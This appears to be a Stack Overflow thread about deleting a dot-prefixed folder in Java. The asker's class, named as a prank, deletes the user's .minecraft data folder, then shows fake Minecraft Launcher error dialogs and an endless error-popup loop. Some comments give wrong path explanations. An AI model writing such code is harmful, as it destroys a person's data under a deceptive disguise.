# Java: Delete a file starting with "."

Tags: java, swing, file

I have been searching endlessly for this, and can't find anything.
The file `.minecraft` will not delete. I have tried renaming it to just `minecraft` but that still will not work.

`import javax.swing.JOptionPane;`

`import java.io.File;`

`public class justaprankbro {`

```
public static void main(String[] args){
    int x;

    File file = new File(System.getProperty("user.home") + "/AppData/Roaming/.minecraft");

    if(file.isHidden()){
        System.out.println("This file is hidden");
    }else{
        System.out.println("This file is not hidden");
    }


    if(file.delete()){
            System.out.println(file.getName() + " is deleted!");
    }else{
            System.out.println("Delete operation is failed.");
    }



    JOptionPane.showMessageDialog (null, "A new Minecraft Launcher was released" + "\nPlease click OK to update", "Minecraft Launcher 1.6.61", JOptionPane.WARNING_MESSAGE);

    try {
        Thread.sleep(5000);                 //1000 milliseconds is one second.
    } catch(InterruptedException ex) {
        Thread.currentThread().interrupt();
    }

    JOptionPane.showMessageDialog (null, "Unable to start the Minecraft Runtime Environment. This is most " + "\nlikely caused by a corruption. Please press OK to auto-fix.", "Minecraft Launcher 1.6.61", JOptionPane.WARNING_MESSAGE);

    try {
        Thread.sleep(3000);                 //1000 milliseconds is one second.
    } catch(InterruptedException ex) {
        Thread.currentThread().interrupt();
    }
    JOptionPane.showMessageDialog (null, "Error: 34; minecraft failed to start, please" + "\npress OK to backup files and reinstall", "Minecraft Launcher 1.6.61", JOptionPane.ERROR_MESSAGE);

    for(x = 0; x < 1; x = 0){
        JOptionPane.showMessageDialog (null, "Fatal Error, please contact Mojang immidiately", "Minecraft Launcher 1.6.61", JOptionPane.ERROR_MESSAGE);
    }
}
```

`}`

Comment: @AndorNémeth Thank you, honestly, this question from four years ago has been ruining my stackoverflow rep ever since.

Answer (score 3, accepted):

Use the nio package instead :

```
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;

Path p = Paths.get("/tmp/.minecraft");

if(!Files.exists(p)){
    Files.createFile(p);
}
if(Files.exists(p)){
    Files.delete(p);
}
```

Comment: Why is the nio package better? Does it work in the same way? What even is nio?

Comment: It's not fundamentally better and using the standard io package is fine, I'm not sure where is your error coming from but having a clean example of file deletion (starting with a .) might be a good starting point.

Comment: My program works perfectly fine with all other test files I made, but not the `.minecraft` file.

Comment: `System.getProperty("user.home")` returns the user's desktop on windows. Use `System.getProperty("user.home") + "/.."` or similar instead.

Comment: What does /.. do? And my program was working fine with all other files with the way I had it.

Comment: / is the root path
.. means the parent folder
so /.. means the parent folder of root which is incorrect

Comment: @BenoitVanalderweireldt Wrong, with `<somepath> + "/.."` it means the parent folder of `<somepath>`, so in this case it would return the parent folder of the desktop.

Comment: "/.." != '"<somepath>" + "/.."'

Comment: Guys I figured out my mistake, the folder had other files inside of it, so I had to delete the insides before I could delete the folder.

Comment: Hey can you guys undownvote my question? I can't post any more.